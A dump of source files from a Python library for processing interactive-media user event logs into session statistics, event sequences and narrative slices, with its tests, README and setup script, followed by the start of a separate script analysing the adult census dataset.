time and the associated counts\n test_counts = test_freq[time] # get the event counts for the time slice\n for event, count in counts.items(): # for each event and its count\n assert test_counts[event] == count # assert they're equal\n\ndef test_event_frequencies_single_user(test_data, event_frequencies, interaction_events):\n frequencies = [v * 60 for v in range(0, 6)]\n stats = Statistics(test_data)\n user = 'be3720be-3da1-419c-b912-cacc3f80a427'\n\n # test that the event frequencies are correct when fetching a single user\n res = stats.event_frequencies(frequencies, interaction_events, user_id = user)\n\n # for each of the time slices and counts\n for time, counts in event_frequencies[user].items():\n test_counts = res[time] # get the counts for the test slice\n for event, count in counts.items(): # for each event and count\n assert test_counts[event] == count # assert that they're the same\n\ndef test_event_frequencies_errors(test_data, event_frequencies, interaction_events):\n stats = Statistics(test_data)\n\n # test that a type error is thrown when:\n with pytest.raises(TypeError):\n # a non-list type is passed as event frequencies\n stats.event_frequencies(frequencies = {}, interaction_events = interaction_events)\n\n # a non integer/float list is passed as event frequencies\n stats.event_frequencies(frequencies = ['1', '2'], interaction_events = interaction_events)\n\n # a non-string type is passed as the user id\n stats.event_frequencies(event_frequencies, interaction_events, user_id = 150)\n\n # a non-string type is passed after the frequencies have been calculated.\n stats.event_frequencies(event_frequencies, interaction_events)\n stats.event_frequencies(event_frequencies, interaction_events, user_id = 150)\n\n # test that a value error is thrown when:\n with pytest.raises(ValueError):\n # an event frequencies empty list is passed\n stats.event_frequencies(frequencies = [], interaction_events = interaction_events)\n\n # a user id that is not in the data is passed\n stats.event_frequencies(event_frequencies, interaction_events, user_id = '150b')\n\n # a user id that is not in the data is passed 
after the frequencies have been calculated\n stats.event_frequencies(event_frequencies, interaction_events)\n stats.event_frequencies(event_frequencies, interaction_events, user_id = '150b')\n\n\n# ------ OVERALL STATISTICS ------\ndef test_overall_statistics(test_data, ground_truth, interaction_events, time_stats):\n stats = Statistics(test_data, completion_point = 'Credits')\n res = stats.calculate_statistics(\n interaction_events, \n verbose = 0, \n include_link_choices = True, \n include_user_set_variables = True,\n pauses_include_events = {'BROWSER_VISIBILITY_CHANGE', 'WINDOW_ORIENTATION_CHANGE'},\n pauses_exclude_events = {'USER_SET_VARIABLE', 'LINK_CHOICE_CLICKED'}\n )\n\n for user, stat in ground_truth.items():\n for s_name, s_value in stat.items():\n if s_name in time_stats:\n assert s_value == pytest.approx(res[user][s_name], 0.1)\n else:\n assert s_value == res[user][s_name]\n\ndef test_overall_statistics_single_user(test_data, ground_truth, interaction_events, time_stats):\n stats = Statistics(test_data, completion_point = 'Credits')\n user = '959c1a91-8b0f-4178-bc59-70499353204f'\n\n individual_results = stats.calculate_statistics(\n interaction_events, \n user_id = user,\n include_link_choices = True,\n include_user_set_variables = True,\n pauses_include_events = {'BROWSER_VISIBILITY_CHANGE', 'WINDOW_ORIENTATION_CHANGE'},\n pauses_exclude_events = {'USER_SET_VARIABLE', 'LINK_CHOICE_CLICKED'}\n )\n individual_ground_truth_results = ground_truth[user]\n\n for stat, value in individual_results.items():\n if '_proportion' in stat or 'nec_time' in stat: continue # we'll test this further down\n\n if stat in time_stats:\n assert individual_ground_truth_results[stat] == pytest.approx(value, 0.1)\n else:\n assert individual_ground_truth_results[stat] == value\n \ndef test_overall_statistics_single_user_without_lcc_usv(test_data, ground_truth, interaction_events, time_stats):\n stats = Statistics(test_data, completion_point = 'Credits')\n user = 'b194b76c-7866-4b6d-8502-93ffe6322b64'\n\n # LCC and USV are included in the ground truth total events by default\n gt_individual = ground_truth[user]\n for stat, value in gt_individual.copy().items():\n if stat == 'LINK_CHOICE_CLICKED' or stat == 'USER_SET_VARIABLE':\n gt_individual['total_events'] -= gt_individual[stat]\n \n res_individual = stats.calculate_statistics(\n interaction_events, \n user_id = user,\n pauses_include_events = {'BROWSER_VISIBILITY_CHANGE', 'WINDOW_ORIENTATION_CHANGE'},\n pauses_exclude_events = {'USER_SET_VARIABLE', 'LINK_CHOICE_CLICKED'}\n )\n\n for stat, value in res_individual.items():\n if '_proportion' in stat or 'nec_time' in stat: continue # we'll test this further down\n \n if stat in time_stats:\n assert gt_individual[stat] == pytest.approx(value, 0.1)\n else:\n assert gt_individual[stat] == value\n \ndef test_overall_statistics_errors(test_data, ground_truth, interaction_events):\n stats = Statistics(test_data)\n\n # test that a type error is thrown when passing a non-set interaction_events\n with pytest.raises(TypeError):\n stats.calculate_statistics(interaction_events = [])\n\n # test that a value error is thrown when passing an empty set\n with pytest.raises(ValueError):\n stats.calculate_statistics(interaction_events = set([]))\n\n # test that a type error is thrown when a set not containing strings is passed\n with pytest.raises(TypeError):\n stats.calculate_statistics(interaction_events = set([1, 2, 3, 4]))\n\n # if stats hasn't been calculated, test that TypeError is thrown when\n # a non-string user_id is 
passed\n with pytest.raises(TypeError):\n stats.calculate_statistics(\n interaction_events = interaction_events,\n user_id = 150\n )\n\n # if stats hasn't been calculated, test that a ValueError is thrown\n # when an invalid user_id is passed.\n with pytest.raises(ValueError):\n stats.calculate_statistics(\n interaction_events = interaction_events,\n user_id = '150b'\n )\n\n stats.calculate_statistics(interaction_events)\n\n # test the same two previous errors now the stats have been\n # calculated.\n with pytest.raises(TypeError):\n stats.calculate_statistics(\n interaction_events = interaction_events,\n user_id = 150\n )\n\n with pytest.raises(ValueError):\n stats.calculate_statistics(\n interaction_events = interaction_events,\n user_id = '150b'\n )\n\n# ----- TEST AVG NEC TIME STATISTICS -----\[email protected]\ndef additional_statistics():\n with open('tests/test_data_files/test_additional_statistics.json', 'r') as d_in:\n data = json.load(d_in)\n return data\n\ndef test_avg_nec_time(test_data, additional_statistics):\n stats = Statistics(test_data, n_jobs = 1)\n res = stats.time_statistics()\n\n for u, s in additional_statistics.items():\n avg = res[u]['avg_nec_time']\n assert s['avg_nec_time'] == pytest.approx(avg, rel=1)\n\n\n# ----- TEST NARRATIVE ELEMENT NORMALISED TIME ----\[email protected]\ndef narrative_element_durations():\n # return json.load(open('tests/test_data_files/narrative_element_durations.json', 'r'))\n return {\n 'Intro Message': 15.00\n }\n\ndef test_norm_time(test_data, narrative_element_durations):\n stats = Statistics(\n test_data, n_jobs = 1, narrative_element_durations=narrative_element_durations)\n res = stats.time_statistics()\n\n # for u, s in res.items():\n # print(u, s['norm_avg_nec_time'], s['norm_std_nec_time'])\n\n # appears to output the correct values - needs proper testing.\n " }, { "alpha_fraction": 0.5551064610481262, "alphanum_fraction": 0.5639989376068115, "avg_line_length": 35.970001220703125, "blob_id": "37af226f887bcadc6056aaf0c3aa3febc773018a", "content_id": "13f34dd7f686940b0706f93c13b17b6243e897e6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3711, "license_type": "no_license", "max_line_length": 94, "num_lines": 100, "path": "/interlib/preprocessing/_event_handler.py", "repo_name": "JonoCX/interaction-lib", "src_encoding": "UTF-8", "text": "\"\"\" \n\n\"\"\"\n\nfrom typing import List, Dict\n\nclass EventHandler():\n \n def __init__(self, aliases: Dict[str, str]):\n if not isinstance(aliases, dict):\n raise TypeError('aliases should be a dictionary, type: {0}'.format(type(aliases)))\n \n if len(aliases) == 0: raise ValueError('aliases is empty, it should be populated')\n\n self.aliases = aliases\n self._volume_tracker = 1.0\n\n def _video_scrub(self, event: Dict) -> str:\n \"\"\" \n \n :params event:\n :returns:\n \"\"\"\n # TODO Not yet implemented into the data.\n pass\n\n def _volume_change(self, event: Dict, action_name: str) -> str:\n \"\"\" \"\"\"\n changed_to_level = float(event['data']['romper_to_state'].split(' ')[1])\n if changed_to_level > self._volume_tracker:\n result = self.aliases[action_name] + '_UP'\n elif changed_to_level < self._volume_tracker:\n result = self.aliases[action_name] + '_DOWN'\n else:\n result = self.aliases[action_name] + '_NO'\n \n self._volume_tracker = changed_to_level\n return result\n\n def _fullscreen(self, event: Dict, action_name: str) -> str:\n \"\"\" \"\"\"\n if event['data']['romper_to_state'] == 'fullscreen':\n return 'TO_' + 
self.aliases[action_name]\n else:\n return 'FROM_' + self.aliases[action_name]\n\n def _browser_visibility_change(self, event: Dict, action_name: str) -> str:\n \"\"\" \"\"\"\n if event['data']['romper_to_state'] == 'hidden':\n return self.aliases[action_name] + '_H'\n else:\n return self.aliases[action_name] + '_V'\n\n def _subtitles(self, event: Dict, action_name: str) -> str:\n \"\"\" \"\"\"\n if event['data']['romper_to_state'] == 'showing':\n return self.aliases[action_name] + '_ON'\n else:\n return self.aliases[action_name] + '_OFF'\n\n def _window_orientation_change(self, event: Dict, action_name: str) -> str: \n \"\"\"\n \"\"\"\n # states: not_set, 90, -90, 0, 180, \"\", or 65446 (happens twice)\n if event['data']['romper_to_state'] in {90, -90}:\n return self.aliases[action_name] + '_H' # horizontal\n elif event['data']['romper_to_state'] in {0, 180}:\n return self.aliases[action_name] + '_V' # vertical\n else: # the odd case where it's near horizontal or vertical (\"\" or 65446)\n return self.aliases[action_name]\n \n def process_event(self, event: Dict) -> str:\n \"\"\" \n Given an event, get the short hand alias for it and \n append any useful additional information to it.\n \n :params event: the event to process (the whole event data as\n a dictionary)\n :returns: the alias representation of the event\n \"\"\"\n action_name = event['action_name']\n if action_name == 'VOLUME_CHANGED':\n return self._volume_change(event, action_name)\n elif action_name == 'FULLSCREEN_BUTTON_CLICKED':\n return self._fullscreen(event, action_name)\n elif action_name == 'BROWSER_VISIBILITY_CHANGE':\n return self._browser_visibility_change(event, action_name)\n elif action_name == 'WINDOW_ORIENTATION_CHANGE':\n return self._window_orientation_change(event, action_name)\n else:\n return self.aliases[action_name]\n\n def reset(self):\n \"\"\" \n This function should be called to reset the tracker variables\n in the class, such as the volume tracker, whenever a user's\n events have been processed.\n \"\"\"\n self._volume_tracker = 1.0\n return self \n \n " }, { "alpha_fraction": 0.6132497787475586, "alphanum_fraction": 0.6192181706428528, "avg_line_length": 32.5099983215332, "blob_id": "66f50806878b95a3ecd017b1c6492b380ab5a89c", "content_id": "b7de85fa1883cd4bbeef1acdab4d60e8ba7dcee0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3351, "license_type": "no_license", "max_line_length": 79, "num_lines": 100, "path": "/tests/test_preprocessing/test_event_handler.py", "repo_name": "JonoCX/interaction-lib", "src_encoding": "UTF-8", "text": "import pytest \nimport pickle, json, datetime\n\nfrom interlib.preprocessing._event_handler import EventHandler\n\[email protected]\ndef aliases():\n return {\n \"START_BUTTON_CLICKED\": \"SB\", \"PLAY_PAUSE_BUTTON_CLICKED\": \"PP\",\n \"BEHAVIOUR_CONTINUE_BUTTON_CLICKED\": \"BC\",\"LINK_CHOICE_CLICKED\": \"LC\",\n \"FULLSCREEN_BUTTON_CLICKED\": \"FS\", \"NEXT_BUTTON_CLICKED\": \"NB\",\n \"VIDEO_SCRUBBED\": \"VS\", \"SEEK_FORWARD_BUTTON_CLICKED\": \"SFW\",\n \"BACK_BUTTON_CLICKED\": \"BB\", \"SEEK_BACKWARD_BUTTON_CLICKED\": \"SBK\",\n \"USER_SET_VARIABLE\": \"US\", \"OVERLAY_BUTTON_CLICKED\": \"OB\",\n \"VOLUME_CHANGED\": \"VC\", \"OVERLAY_DEACTIVATED\": \"OD\",\n \"BROWSER_VISIBILITY_CHANGE\": \"BVC\", \"WINDOW_ORIENTATION_CHANGE\": \"WOC\",\n \"NARRATIVE_ELEMENT_CHANGE\": \"NEC\"\n }\n\n# ------ EVENT TESTS -------\ndef test_volume_change(aliases):\n eh = EventHandler(aliases)\n test_event = {\n 'action_name': 
'VOLUME_CHANGED',\n 'data': {'romper_to_state': 'Background: 0.5'}\n }\n # default value is 1.0, so the volume has been decreased\n assert eh.process_event(test_event) == 'VC_DOWN'\n\n # increase the volume\n test_event['data']['romper_to_state'] = 'Background: 0.7'\n assert eh._volume_tracker == 0.5\n assert eh.process_event(test_event) == 'VC_UP'\n assert eh._volume_tracker == 0.7\n\n # don't change the volume\n assert eh.process_event(test_event) == 'VC_NO'\n\n # reset the volume\n eh = eh.reset()\n assert eh._volume_tracker == 1.0\n\ndef test_fullscreen(aliases):\n eh = EventHandler(aliases)\n test_event = {\n 'action_name': 'FULLSCREEN_BUTTON_CLICKED',\n 'data': {'romper_to_state': 'fullscreen'}\n }\n assert eh.process_event(test_event) == 'TO_FS'\n\n # come out of full screen\n test_event['data']['romper_to_state'] = 'not-fullscreen'\n assert eh.process_event(test_event) == 'FROM_FS'\n\ndef test_browser_visibility_change(aliases):\n eh = EventHandler(aliases)\n test_event = {\n 'action_name': 'BROWSER_VISIBILITY_CHANGE',\n 'data': {'romper_to_state': 'hidden'}\n }\n assert eh.process_event(test_event) == 'BVC_H'\n\n # back to visible\n test_event['data']['romper_to_state'] = 'visible'\n assert eh.process_event(test_event) == 'BVC_V'\n\ndef test_window_orientation_change(aliases):\n eh = EventHandler(aliases)\n test_event = {\n 'action_name': 'WINDOW_ORIENTATION_CHANGE',\n 'data': {'romper_to_state': 90}\n }\n assert eh.process_event(test_event) == 'WOC_H'\n\n test_event['data']['romper_to_state'] = -90\n assert eh.process_event(test_event) == 'WOC_H'\n\n # to vertical\n test_event['data']['romper_to_state'] = 0\n assert eh.process_event(test_event) == 'WOC_V'\n\n test_event['data']['romper_to_state'] = 180\n assert eh.process_event(test_event) == 'WOC_V'\n\n # odd case\n test_event['data']['romper_to_state'] = \"\"\n assert eh.process_event(test_event) == 'WOC'\n\ndef test_all_events(aliases):\n eh = EventHandler(aliases)\n test_events = [{'action_name': ev} for ev in aliases.keys()]\n\n exclude = {\n 'VOLUME_CHANGED', 'FULLSCREEN_BUTTON_CLICKED', \n 'BROWSER_VISIBILITY_CHANGE', 'WINDOW_ORIENTATION_CHANGE'\n }\n for ev in test_events:\n if ev['action_name'] in exclude:\n continue\n assert eh.process_event(ev) == aliases[ev['action_name']]\n" }, { "alpha_fraction": 0.5003786683082581, "alphanum_fraction": 0.5041655898094177, "avg_line_length": 37.34951400756836, "blob_id": "e19e4f0987f8cbe8aa0471276656ad33ce747539", "content_id": "0105b6e7f342e3c5ed1e8f3075b24a55bd9f6b9d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3961, "license_type": "no_license", "max_line_length": 99, "num_lines": 103, "path": "/interlib/preprocessing/slices.py", "repo_name": "JonoCX/interaction-lib", "src_encoding": "UTF-8", "text": "\"\"\"\n \n\"\"\"\nimport pandas as pd \n\nfrom .base import BaseExtractor\nfrom .statistics import Statistics\nfrom ..util import to_dataframe\nfrom typing import Optional, List, Dict \n\nclass StatisticalSlices(BaseExtractor):\n\n def __init__(\n self, \n user_events: Dict[str, List[Dict]], \n interaction_events: List[str],\n narrative_element_durations: Optional[Dict[str, float]] = None \n ):\n super().__init__(user_events)\n\n self._slices = []\n self._interaction_events = interaction_events\n self._is_sliced = False\n self._nec_durations = narrative_element_durations\n\n def _window(self, events_arr, indices):\n event_slices = []\n\n for idx, val in enumerate(indices):\n chunk = []\n if val == indices[-1]: # last 
element in the list\n chunk = [ev for ev in events_arr[val:]]\n elif idx == 0 and val != 0: # first iteration\n chunk = [ev for ev in events_arr[0:val + 1]]\n else: # otherwise it's in the middle\n chunk = [ev for ev in events_arr[val:indices[idx + 1] + 1]]\n \n event_slices.append(chunk)\n \n return event_slices\n\n def _get_indices(self, events_arr):\n return [\n idx \n for idx, ev in enumerate(events_arr) \n if ev['action_name'] == 'NARRATIVE_ELEMENT_CHANGE'\n ]\n\n def get_slices(self, as_df = False):\n if self._is_sliced:\n if as_df: return pd.DataFrame(self._slices)\n else: return self._slices\n\n for user, events in self.data.items():\n indices = self._get_indices(events)\n windows = self._window(events, indices)\n\n for wind in windows:\n # need to know what the completion point is... \n if wind[-1]['action_name'] == 'NARRATIVE_ELEMENT_CHANGE':\n end_point = wind[-1]['data']['romper_to_state']\n\n s = Statistics(\n {user: wind}, completion_point = end_point, n_jobs = 1,\n narrative_element_durations = self._nec_durations\n )\n wind_stats = s.calculate_statistics(\n self._interaction_events, \n include_link_choices = True\n )\n wind_stats[user]['abandon'] = False\n wind_stats[user]['from_state'] = wind[0]['data']['romper_to_state']\n wind_stats[user]['to_state'] = end_point \n wind_stats[user]['user'] = user\n\n # get the timestamp of the last element because the metrics are recorded\n # between the first and the last, so it's the metrics that have happened\n # in the build up to this timestamp\n wind_stats[user]['timestamp'] = wind[-1]['timestamp']\n else:\n # abandon\n s = Statistics(\n {user: wind}, n_jobs = 1, narrative_element_durations = self._nec_durations\n )\n wind_stats = s.calculate_statistics(\n self._interaction_events,\n include_link_choices = True \n )\n wind_stats[user]['abandon'] = True \n wind_stats[user]['from_state'] = wind[0]['data']['romper_to_state']\n wind_stats[user]['to_state'] = 'abandon'\n wind_stats[user]['user'] = user\n\n # time that the abandon happened.\n wind_stats[user]['timestamp'] = wind[-1]['timestamp']\n\n # self._slices[user].append(wind_stats[user])\n self._slices.append(wind_stats[user])\n \n self._is_sliced = True\n\n if as_df: return pd.DataFrame(self._slices)\n else: return self._slices\n \n\n\n" }, { "alpha_fraction": 0.7059119343757629, "alphanum_fraction": 0.7335612177848816, "avg_line_length": 47.51707458496094, "blob_id": "3d5eb3f721d85fa5f6965813cd9ee55fb73aaf0f", "content_id": "7446959111d5eed6c7bf6076f6dcf7c361c0165d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 9946, "license_type": "no_license", "max_line_length": 528, "num_lines": 205, "path": "/README.md", "repo_name": "JonoCX/interaction-lib", "src_encoding": "UTF-8", "text": "# InterLib\n\n[![Build Status](https://travis-ci.com/JonoCX/interaction-lib.svg?token=sYqfGmcBzimeQwqRHqma&branch=master)](https://travis-ci.com/JonoCX/interaction-lib)\n\nInterlib is a data processing library created to work with interaction data. In their raw form, the interactions of users tell us little and need to be processed into a workable and descriptive format. Using this library, you can extract session statistics, sequences, and perform various common processing tasks that I have found useful in the past.\n\n## Installation\n\nCurrently, the package is not available on the pip package manager -- it will be once the library has been open-sourced alongside some data -- so the process to install involves installing directly from GitHub. 
(Please ensure that you have an appropriate Python 3.6+ virtual environment installed and activated before installing this package; I would recommend Anaconda (Miniconda: https://docs.conda.io/en/latest/miniconda.html)).\n\n```bash\n$ pip install -e git+https://github.com/JonoCX/interaction-lib.git#egg=interlib\n```\n\n## Usage\nThe library makes the presumption that you have interaction data in a particular format, stored as a JSON file:\n\n```json\n{\"<user_1>\": [\n {\"id\": 1,\n \"user\": \"<user_1>\",\n \"timestamp\": \"datetime.datetime(2019, 8, 5, 16, 26, 36, 940000)\",\n \"action_type\": \"STORY_NAVIGATION\",\n \"action_name\": \"NARRATIVE_ELEMENT_CHANGE\",\n \"data\": {\n \"romper_type\": \"STORY_NAVIGATION\",\n \"romper_name\": \"NARRATIVE_ELEMENT_CHANGE\",\n \"romper_id\": \"\",\n \"romper_from_state\": \"null\",\n \"romper_to_state\": \"Intro Message\",\n \"current_narrative_element\": \"null\",\n \"current_representation\": \"\"\n }}, {}],\n\"<user_N>\": []}\n```\n\nThe data snippet above is a single event, in a parsed format, recorded in an interactive experience. It is a dictionary mapping each user to a list of events. If you're working with raw data extracted directly from an experience, then it will not be in the above format. As such, the library includes a utility method to convert raw data (from an SQL dump) into a usable format:\n\n```python\nfrom interlib.util import to_dict\nuser_events = to_dict('path/to/json.json')\n```\n\nThe `to_dict` function has additional parameters that can be passed, for example if you're dealing with a large amount of data then perhaps you'll want to split the data into chunks (useful for parallel processing):\n\n```python\nuser_events = to_dict('path/to/json.json', split = True) # splits into two, or;\nuser_events = to_dict('path/to/json.json', split = 4) # splits into four\n```\n\nIn some cases, you may want to process only a select group of users:\n\n```python\nusers = set([<user_1>, <user_2>]) # a set of user id strings\nuser_events = to_dict('path/to/json.json', users_to_include = users)\n```\n\nA range of other parameters can be set; please explore: [View to_dict function](https://github.com/JonoCX/interaction-lib/blob/522718574a4dbff78937f95be74564baacef1dfa/interlib/util/data.py#L71)\n\n## Statistics\nA range of statistics can be extracted using the library: \n\n- [Time](https://github.com/JonoCX/interaction-lib/blob/522718574a4dbff78937f95be74564baacef1dfa/interlib/preprocessing/statistics.py#L42): hidden time, session length, time to completion, raw session length, reach end;\n- [Pauses](https://github.com/JonoCX/interaction-lib/blob/522718574a4dbff78937f95be74564baacef1dfa/interlib/preprocessing/statistics.py#L239): short (1 to 5 seconds), medium (6 to 15), long (16 to 30), very long (30+), as counts;\n- [Events](https://github.com/JonoCX/interaction-lib/blob/522718574a4dbff78937f95be74564baacef1dfa/interlib/preprocessing/statistics.py#L304): counts and relative frequencies of interaction events;\n- [Event Frequencies](https://github.com/JonoCX/interaction-lib/blob/522718574a4dbff78937f95be74564baacef1dfa/interlib/preprocessing/statistics.py#L410): given a set of time thresholds, the frequency for each event in those thresholds.\n\nAgain, the statistics package works under the assumption that you have parsed the raw events into the format described above. 
\n\nIf you want to [calculate all statistics](https://github.com/JonoCX/interaction-lib/blob/522718574a4dbff78937f95be74564baacef1dfa/interlib/preprocessing/statistics.py#L595) -- excluding event frequencies -- then do the following:\n\n```python\nfrom interlib.preprocessing.statistics import Statistics\n\ninteraction_events = set(['NARRATIVE_ELEMENT_CHANGE', 'NEXT_BUTTON_CLICKED', ...]) # set of all user events you want to consider\nstats = Statistics(\n user_events, # the user -> list of events dictionary\n completion_point = 'Make step 25', # the point in the experience determined to be the end\n n_jobs = -1 # the number of cores to run on (-1, which runs on all available cores, is the default)\n)\nuser_statistics = stats.calculate_statistics(interaction_events)\nprint(user_statistics)\n```\n\n```json\n{\"<user_1>\": {\n \"hidden_time\": 0.0, \"time_to_completion\": 1722.157, \"reach_end\": True, \"raw_session_length\": 1847.197,\n \"session_length\": 1847.197, \"SP\": 4, \"MP\": 0, \"LP\": 4, \"VLP\": 25,\n \"NEXT_BUTTON_CLICKED\": 56, \"BACK_BUTTON_CLICKED\": 0, \"VIDEO_SCRUBBED\": 0, \"VOLUME_CHANGED\": 0,\n \"REPEAT_BUTTON_CLICKED\": 1, \"BROWSER_VISIBILITY_CHANGE\": 0, \"SWITCH_VIEW_BUTTON_CLICKED\": 2,\n \"NARRATIVE_ELEMENT_CHANGE\": 30, \"FULLSCREEN_BUTTON_CLICKED\": 0, \"OVERLAY_BUTTON_CLICKED\": 2,\n \"SUBTITLES_BUTTON_CLICKED\": 0, \"PLAY_PAUSE_BUTTON_CLICKED\": 0, \"LINK_CHOICE_CLICKED\": 0,\n \"USER_SET_VARIABLE\": 0, \"total_events\": 91},\n\"<user_N>\": {}, }\n```\n\nIf you want to calculate specific statistics, e.g. the time statistics, the library provides that option:\n\n```python\nfrom interlib.preprocessing.statistics import Statistics\n\n# create a Statistics object\nstats = Statistics(\n user_events,\n completion_point = 'Make step 25', # without this, some statistics cannot be calculated (reached end and time to completion)\n n_jobs = -1\n)\ninteraction_events = set(['NARRATIVE_ELEMENT_CHANGE', 'NEXT_BUTTON_CLICKED', ...]) # set of all user events you want to consider\n\n# calculate the time statistics\ntime_statistics = stats.time_statistics()\n\n# calculate pause statistics\npause_statistics = stats.pause_statistics()\n\n# calculate event statistics\nevent_statistics = stats.event_statistics(\n interaction_events = interaction_events\n)\n\n# calculate event frequencies\nevent_frequencies = stats.event_frequencies(\n frequencies = [0, 60, 120, 180], # indicates that you want frequencies for minutes 0 to 1, 1 to 2, and 2 to 3.\n interaction_events = interaction_events\n)\n\n# You can also fetch just the session lengths from the user events\nsession_lengths = stats.calculate_session_length()\n```\n\nNote regarding `n_jobs`: When setting the `n_jobs` parameter, if you have a small dataset then use a single (1) core; otherwise, the default will result in slow performance. I would recommend incrementally increasing the parameter when the data size is over 2GB (i.e., 2 cores for 2 to 4GB, 3 cores for 4 to 6GB, 4+ cores for 6GB+). The parameter also sets how computation is performed throughout the extractor you're working with, i.e. if `n_jobs = -1` in `Statistics` then all functions in that object will use `-1` cores (all).\n\n## Sequences\nAn alternative data representation is sequences, where the events are processed into a common format and their temporal ordering is preserved. 
Before starting, you need to define both the interaction events that you want to include in the sequences and aliases (short-hand names):\n\n```python\ninteraction_events = set([\"PLAY_PAUSE_BUTTON_CLICKED\", \"BACK_BUTTON_CLICKED\", ...])\naliases = dict({\"PLAY_PAUSE_BUTTON_CLICKED\": \"PP\", \"BACK_BUTTON_CLICKED\": \"BB\", ...})\n```\n\nThe way in which this extractor works is very similar to `Statistics` and there is a presumption that the events are in the same format as previously. \n\nTo extract the sequences (presumes you have already loaded a `user_events` object):\n\n```python\nfrom interlib.preprocessing.sequences import Sequences\n\nseq = Sequences(user_events) # set-up the Sequences object\nuser_sequences = seq.get_sequences(interaction_events, aliases)\nprint(user_sequences)\n```\n\n```json\n{\n \"<user_1>\": [\"NEC\", \"MP\", \"PP\", \"VLP\", \"NB\", \"NB\", \"NEC\", \"VLP\", ...],\n \"<user_2>\": [],\n \"<user_N>\": []\n}\n```\n\nIn some analysis cases, n-grams can prove a useful tool to represent sequences. As such, the library provides this option:\n\n```python\nn_grams = seq.get_ngrams(n = 3) # extract tri-grams\n```\n\n## Utility\n\nWhile the above deals with extracting data representations and features from the data, the utility package provides some common functions that may come in handy while working with this type of data. It is by no means exhaustive; it is essentially a set of common functions that I have found useful when processing the data in the past. The main function in `util`, `to_dict`, has already been covered.\n\n```python\nfrom interlib.util import parse_raw_data, parse_timestamp, to_dataframe\n```\n\n**Parsing Raw Data**\nIf you have a list of raw events, then you're able to parse these into a format that is recognisable by the library:\n\n```python\nparsed_events = parse_raw_data(\n raw_data,\n datetime_format = \"%Y-%m-%d %H:%M:%S.%f\",\n include_narrative_element_id = False\n)\n```\n\n**Parsing Timestamps**\nWhen handling the raw data, a common task was to parse the timestamps into `datetime` objects from strings. This function, given a list of events in their raw format and with a `timestamp` element, parses the timestamps into `datetime` objects:\n\n```python\nparsed_events = parse_timestamp(\n raw_data,\n datetime_format = \"%Y-%m-%d %H:%M:%S.%f\"\n)\n```\n\n**To DataFrame**\nTo start analysing the data, I recommend using pandas. To help, there is a utility function that can convert the output from the `Statistics` object into a usable dataframe. 
\n\n```python\ndf = to_dataframe(user_statistics)\n```\n\n## Reference\n\nPublish: TODO :)\n" }, { "alpha_fraction": 0.6824034452438354, "alphanum_fraction": 0.6866952776908875, "avg_line_length": 22.350000381469727, "blob_id": "50936de25c17af9a6e5eca58db66b3ec110ec43b", "content_id": "7e06e8ecb3a6780eba92ff6ecd258c8536e61b98", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 466, "license_type": "no_license", "max_line_length": 57, "num_lines": 20, "path": "/setup.py", "repo_name": "JonoCX/interaction-lib", "src_encoding": "UTF-8", "text": "from distutils.core import setup\n\nname = 'interlib'\nversion = 0.1\ndescription = 'A library for processing interaction data'\nurl = 'https://github.com/JonoCX/interaction-lib'\nauthor = 'Jonathan Carlton'\nauthor_email = '[email protected]'\nlong_description = description\n\nsetup(\n name = name,\n version = version,\n description = description,\n url = url,\n author = author,\n author_email = author_email,\n long_description = long_description,\n packages = ['interlib']\n)" }, { "alpha_fraction": 0.7638888955116272, "alphanum_fraction": 0.7638888955116272, "avg_line_length": 23.33333396911621, "blob_id": "ea51fe77d0d3a8d23a4dd769001d1b1bc00419eb", "content_id": "5a8a958cae0bd5b08f0357145df9922ca1298dd9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 72, "license_type": "no_license", "max_line_length": 25, "num_lines": 3, "path": "/interlib/preprocessing/__init__.py", "repo_name": "JonoCX/interaction-lib", "src_encoding": "UTF-8", "text": "from .sequences import *\nfrom .statistics import *\nfrom .slices import *" } ]
17
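The interlib README above demonstrates `seq.get_ngrams(n = 3)` without spelling out what an n-gram over an event sequence looks like. Here is a minimal, self-contained sketch of the idea, independent of interlib: the `ngrams` helper and the sample sequence are illustrative assumptions, not library code, but they mirror the alias lists shown in the `get_sequences` output.

```python
from typing import List, Tuple

def ngrams(sequence: List[str], n: int = 3) -> List[Tuple[str, ...]]:
    # slide a window of size n over the list of event aliases,
    # keeping the temporal ordering of the original sequence
    return [tuple(sequence[i:i + n]) for i in range(len(sequence) - n + 1)]

user_sequence = ["NEC", "MP", "PP", "VLP", "NB", "NB", "NEC", "VLP"]
print(ngrams(user_sequence, n=3))
# first tri-gram: ('NEC', 'MP', 'PP')
```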
superg2009/comp3710AIProject
https://github.com/superg2009/comp3710AIProject
1635bb5161fe2dc97a5b38aa1c0b1523dc72b47a
2314e6ca154e21c9bdc881e260e6259e0af1966a
7809620ed0d7d25abffdb652f31d5a7f6b5bb443
refs/heads/master
2021-01-03T04:40:49.774429
2020-02-12T04:31:59
2020-02-12T04:31:59
239,926,859
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6704514622688293, "alphanum_fraction": 0.6882941126823425, "avg_line_length": 21.149700164794922, "blob_id": "ef1ad8f0be9679ad6766f3332583103ce463c521", "content_id": "c1837c18ef870809703091dd8fe985b233908204", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3699, "license_type": "no_license", "max_line_length": 151, "num_lines": 167, "path": "/AIClassification.py", "repo_name": "superg2009/comp3710AIProject", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport matplotlib.pyplot as plt # graphing lib\nimport numpy as np # linear alg.\nimport pandas as pd # data manipulation\nimport seaborn as sns # nicer matplot graphs\n#get_ipython().run_line_magic('matplotlib', 'inline # inline graphs are nice to have')\n\n\n# In[2]:\n\n\n# name columns\nname_headers = ['age','workclass','fnlwgt','education','education_num',\n 'marital_status','occupation',\n 'relationship','race','sex','capital_gain',\n 'capital_loss','hours_per_week','native_country','income']\n# read data in\ndf=pd.read_csv('adult.csv',names=name_headers)\n\n\n# In[3]:\n\n\ndf = df.fillna(np.nan)\ndf = df.applymap(lambda x: np.nan if x=='?' else x)\nsns.set(color_codes=True)\n\n\n# In[4]:\n\n\ndf.columns\n\n\n# In[5]:\n\n\n#looking at age 